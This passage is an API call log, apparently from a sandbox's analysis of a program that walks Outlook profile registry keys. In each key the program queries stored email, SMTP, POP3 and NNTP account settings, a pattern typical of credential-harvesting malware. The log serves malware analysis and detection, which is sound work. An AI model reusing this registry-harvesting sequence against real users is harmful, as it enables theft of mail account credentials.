pcbData=0xdf6f0*=0x208) returned 0x2 [0115.100] GetProcessHeap () returned 0x5b0000 [0115.101] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.101] GetProcessHeap () returned 0x5b0000 [0115.101] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.102] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.102] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046") returned 88 [0115.102] GetProcessHeap () returned 0x5b0000 [0115.102] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.102] GetProcessHeap () returned 0x5b0000 [0115.103] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.103] GetProcessHeap () returned 0x5b0000 [0115.103] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0115.103] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.104] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046", phkResult=0x5ca970 | out: phkResult=0x5ca970*=0x1f0) returned 0x0 [0115.104] GetProcessHeap () returned 0x5b0000 [0115.104] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.105] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.105] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.105] GetProcessHeap () returned 0x5b0000 [0115.105] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.106] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.106] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.106] GetProcessHeap () returned 0x5b0000 [0115.106] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0115.106] GetProcessHeap () returned 0x5b0000 [0115.107] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.107] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.108] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.108] GetProcessHeap () returned 0x5b0000 [0115.108] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa10 | out: hHeap=0x5b0000) returned 1 [0115.108] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.109] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x6, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="8763203907727d498bce4b981b157d7b", pcchName=0xdfb7c) returned 0x0 [0115.109] GetProcessHeap () returned 0x5b0000 [0115.109] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0115.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.110] RegOpenKeyW (in: hKey=0x204, lpSubKey="8763203907727d498bce4b981b157d7b", phkResult=0x5ca970 | out: phkResult=0x5ca970*=0x1fc) returned 0x0 [0115.110] GetProcessHeap () returned 0x5b0000 [0115.110] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.110] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.111] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.111] GetProcessHeap () returned 0x5b0000 [0115.111] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.111] GetProcessHeap () returned 0x5b0000 [0115.111] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.112] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.112] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b") returned 88 [0115.112] GetProcessHeap () returned 0x5b0000 [0115.112] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.112] GetProcessHeap () returned 0x5b0000 [0115.113] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.113] GetProcessHeap () returned 0x5b0000 [0115.113] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca980 [0115.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.114] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8763203907727d498bce4b981b157d7b", phkResult=0x5ca980 | out: phkResult=0x5ca980*=0x1f0) returned 0x0 [0115.114] GetProcessHeap () returned 0x5b0000 [0115.115] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.115] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.115] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.115] GetProcessHeap () returned 0x5b0000 [0115.116] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.116] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.117] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.117] GetProcessHeap () returned 0x5b0000 [0115.117] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca980 | out: hHeap=0x5b0000) returned 1 [0115.117] GetProcessHeap () returned 0x5b0000 [0115.117] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.118] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.118] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.118] GetProcessHeap () returned 0x5b0000 [0115.118] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca970 | out: hHeap=0x5b0000) returned 1 [0115.119] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.119] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x7, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="893893ade607c44aa338ac7df5d6cb42", pcchName=0xdfb7c) returned 0x0 [0115.119] GetProcessHeap () returned 0x5b0000 [0115.119] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5caa70 [0115.120] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.120] RegOpenKeyW (in: hKey=0x204, lpSubKey="893893ade607c44aa338ac7df5d6cb42", phkResult=0x5caa70 | out: phkResult=0x5caa70*=0x1fc) returned 0x0 [0115.121] GetProcessHeap () returned 0x5b0000 [0115.121] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.121] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.121] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.121] GetProcessHeap () returned 0x5b0000 [0115.122] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.122] GetProcessHeap () returned 0x5b0000 [0115.122] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.122] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.123] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42") returned 88 [0115.123] GetProcessHeap () returned 0x5b0000 [0115.123] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.123] GetProcessHeap () returned 0x5b0000 [0115.124] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.124] GetProcessHeap () returned 0x5b0000 [0115.124] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca8d0 [0115.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.125] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\893893ade607c44aa338ac7df5d6cb42", phkResult=0x5ca8d0 | out: phkResult=0x5ca8d0*=0x1f0) returned 0x0 [0115.125] GetProcessHeap () returned 0x5b0000 [0115.125] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.126] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.126] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.126] GetProcessHeap () returned 0x5b0000 [0115.127] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.127] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.128] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.128] GetProcessHeap () returned 0x5b0000 [0115.128] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca8d0 | out: hHeap=0x5b0000) returned 1 [0115.128] GetProcessHeap () returned 0x5b0000 [0115.128] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.132] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.132] GetProcessHeap () returned 0x5b0000 [0115.132] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5caa70 | out: hHeap=0x5b0000) returned 1 [0115.132] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.133] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x8, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="9207f3e0a3b11019908b08002b2a56c2", pcchName=0xdfb7c) returned 0x0 [0115.133] GetProcessHeap () returned 0x5b0000 [0115.133] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca940 [0115.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.134] RegOpenKeyW (in: hKey=0x204, lpSubKey="9207f3e0a3b11019908b08002b2a56c2", phkResult=0x5ca940 | out: phkResult=0x5ca940*=0x1fc) returned 0x0 [0115.134] GetProcessHeap () returned 0x5b0000 [0115.134] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.135] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.135] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.135] GetProcessHeap () returned 0x5b0000 [0115.136] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.136] GetProcessHeap () returned 0x5b0000 [0115.136] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.136] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.137] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2") returned 88 [0115.137] GetProcessHeap () returned 0x5b0000 [0115.137] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.137] GetProcessHeap () returned 0x5b0000 [0115.137] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.138] GetProcessHeap () returned 0x5b0000 [0115.138] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca930 [0115.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.139] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2", phkResult=0x5ca930 | out: phkResult=0x5ca930*=0x1f0) returned 0x0 [0115.139] GetProcessHeap () returned 0x5b0000 [0115.139] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.139] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="", pcchName=0xdfb4c) returned 0x103 [0115.140] GetProcessHeap () returned 0x5b0000 [0115.140] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.141] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.141] RegCloseKey (hKey=0x1f0) returned 0x0 [0115.141] GetProcessHeap () returned 0x5b0000 [0115.141] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca930 | out: hHeap=0x5b0000) returned 1 [0115.141] GetProcessHeap () returned 0x5b0000 [0115.142] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5c9390 | out: hHeap=0x5b0000) returned 1 [0115.142] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.143] RegCloseKey (hKey=0x1fc) returned 0x0 [0115.143] GetProcessHeap () returned 0x5b0000 [0115.143] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca940 | out: hHeap=0x5b0000) returned 1 [0115.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.144] SHEnumKeyExW (in: hkey=0x204, dwIndex=0x9, pszName=0x5cbd20, pcchName=0xdfb7c | out: pszName="9375CFF0413111d3B88A00104B2A6676", pcchName=0xdfb7c) returned 0x0 [0115.144] GetProcessHeap () returned 0x5b0000 [0115.144] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca900 [0115.145] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.145] RegOpenKeyW (in: hKey=0x204, lpSubKey="9375CFF0413111d3B88A00104B2A6676", phkResult=0x5ca900 | out: phkResult=0x5ca900*=0x1fc) returned 0x0 [0115.146] GetProcessHeap () returned 0x5b0000 [0115.146] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.146] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.146] SHQueryValueExW (in: hkey=0x1fc, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208 | out: pdwType=0x0, pvData=0x5cc138, pcbData=0xdf6f0*=0x208) returned 0x2 [0115.146] GetProcessHeap () returned 0x5b0000 [0115.147] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.147] GetProcessHeap () returned 0x5b0000 [0115.147] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc138 [0115.147] LoadLibraryW (lpLibFileName="user32") returned 0x743d0000 [0115.148] wvsprintfW (in: param_1=0x5cc138, param_2="%s\\%s", arglist=0xdfb60 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676") returned 88 [0115.148] GetProcessHeap () returned 0x5b0000 [0115.148] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xb4) returned 0x5c9390 [0115.148] GetProcessHeap () returned 0x5b0000 [0115.149] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc138 | out: hHeap=0x5b0000) returned 1 [0115.149] GetProcessHeap () returned 0x5b0000 [0115.149] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca970 [0115.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.150] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676", phkResult=0x5ca970 | out: phkResult=0x5ca970*=0x1f0) returned 0x0 [0115.150] GetProcessHeap () returned 0x5b0000 [0115.150] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc138 [0115.150] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.151] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x0, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="00000001", pcchName=0xdfb4c) returned 0x0 [0115.151] GetProcessHeap () returned 0x5b0000 [0115.151] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca910 [0115.151] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.152] RegOpenKeyW (in: hKey=0x1f0, lpSubKey="00000001", phkResult=0x5ca910 | out: phkResult=0x5ca910*=0x208) returned 0x0 [0115.152] GetProcessHeap () returned 0x5b0000 [0115.152] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc550 [0115.153] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.153] SHQueryValueExW (in: hkey=0x208, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc550, pcbData=0xdf6c0*=0x208 | out: pdwType=0x0, pvData=0x5cc550, pcbData=0xdf6c0*=0x208) returned 0x2 [0115.153] GetProcessHeap () returned 0x5b0000 [0115.153] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc550 | out: hHeap=0x5b0000) returned 1 [0115.153] GetProcessHeap () returned 0x5b0000 [0115.153] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x3f4a) returned 0x5cc550 [0115.155] wvsprintfW (in: param_1=0x5cc550, param_2="%s\\%s", arglist=0xdfb30 | out: param_1="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001") returned 97 [0115.155] GetProcessHeap () returned 0x5b0000 [0115.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0xc6) returned 0x5be4e8 [0115.155] GetProcessHeap () returned 0x5b0000 [0115.155] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc550 | out: hHeap=0x5b0000) returned 1 [0115.155] GetProcessHeap () returned 0x5b0000 [0115.155] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca980 [0115.156] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001", phkResult=0x5ca980 | out: phkResult=0x5ca980*=0x20c) returned 0x0 [0115.156] GetProcessHeap () returned 0x5b0000 [0115.156] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc550 [0115.157] SHEnumKeyExW (in: hkey=0x20c, dwIndex=0x0, pszName=0x5cc550, pcchName=0xdfb1c | out: pszName="", pcchName=0xdfb1c) returned 0x103 [0115.157] GetProcessHeap () returned 0x5b0000 [0115.158] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc550 | out: hHeap=0x5b0000) returned 1 [0115.159] RegCloseKey (hKey=0x20c) returned 0x0 [0115.159] GetProcessHeap () returned 0x5b0000 [0115.159] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca980 | out: hHeap=0x5b0000) returned 1 [0115.159] GetProcessHeap () returned 0x5b0000 [0115.159] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5be4e8 | out: hHeap=0x5b0000) returned 1 [0115.160] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.161] RegCloseKey (hKey=0x208) returned 0x0 [0115.161] GetProcessHeap () returned 0x5b0000 [0115.161] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5ca910 | out: hHeap=0x5b0000) returned 1 [0115.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.162] SHEnumKeyExW (in: hkey=0x1f0, dwIndex=0x1, pszName=0x5cc138, pcchName=0xdfb4c | out: pszName="00000002", pcchName=0xdfb4c) returned 0x0 [0115.162] GetProcessHeap () returned 0x5b0000 [0115.162] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x4) returned 0x5ca9f0 [0115.162] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76600000 [0115.163] RegOpenKeyW (in: hKey=0x1f0, lpSubKey="00000002", phkResult=0x5ca9f0 | out: phkResult=0x5ca9f0*=0x208) returned 0x0 [0115.163] GetProcessHeap () returned 0x5b0000 [0115.163] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc550 [0115.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.164] SHQueryValueExW (in: hkey=0x208, pszValue="Email", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc550, pcbData=0xdf6c0*=0x208 | out: pdwType=0x0, pvData=0x5cc550, pcbData=0xdf6c0*=0x1e) returned 0x0 [0115.164] GetProcessHeap () returned 0x5b0000 [0115.164] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.164] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.165] SHQueryValueExW (in: hkey=0x208, pszValue="SMTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.165] GetProcessHeap () returned 0x5b0000 [0115.165] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.165] GetProcessHeap () returned 0x5b0000 [0115.165] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.166] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.166] SHQueryValueExW (in: hkey=0x208, pszValue="SMTP Server", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x1c) returned 0x0 [0115.166] GetProcessHeap () returned 0x5b0000 [0115.166] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.166] GetProcessHeap () returned 0x5b0000 [0115.166] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.167] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.167] SHQueryValueExW (in: hkey=0x208, pszValue="SMTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.167] GetProcessHeap () returned 0x5b0000 [0115.168] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.168] GetProcessHeap () returned 0x5b0000 [0115.168] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.169] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.169] SHQueryValueExW (in: hkey=0x208, pszValue="SMTP User", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.169] GetProcessHeap () returned 0x5b0000 [0115.169] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.169] GetProcessHeap () returned 0x5b0000 [0115.169] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.170] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.170] SHQueryValueExW (in: hkey=0x208, pszValue="POP3 Server", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x1a) returned 0x0 [0115.170] GetProcessHeap () returned 0x5b0000 [0115.171] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.171] GetProcessHeap () returned 0x5b0000 [0115.171] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.171] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.172] SHQueryValueExW (in: hkey=0x208, pszValue="POP3 User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.172] GetProcessHeap () returned 0x5b0000 [0115.172] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.172] GetProcessHeap () returned 0x5b0000 [0115.172] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.173] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.173] SHQueryValueExW (in: hkey=0x208, pszValue="POP3 User", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x1e) returned 0x0 [0115.173] GetProcessHeap () returned 0x5b0000 [0115.174] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.174] GetProcessHeap () returned 0x5b0000 [0115.174] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.174] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.175] SHQueryValueExW (in: hkey=0x208, pszValue="NNTP Email Address", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.175] GetProcessHeap () returned 0x5b0000 [0115.175] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.175] GetProcessHeap () returned 0x5b0000 [0115.175] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 0x5cc968 [0115.180] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0115.180] SHQueryValueExW (in: hkey=0x208, pszValue="NNTP User Name", pdwReserved=0x0, pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208 | out: pdwType=0x0, pvData=0x5cc968, pcbData=0xdf6b8*=0x208) returned 0x2 [0115.180] GetProcessHeap () returned 0x5b0000 [0115.180] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cc968 | out: hHeap=0x5b0000) returned 1 [0115.183] GetProcessHeap () returned 0x5b0000 [0115.183] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x410) returned 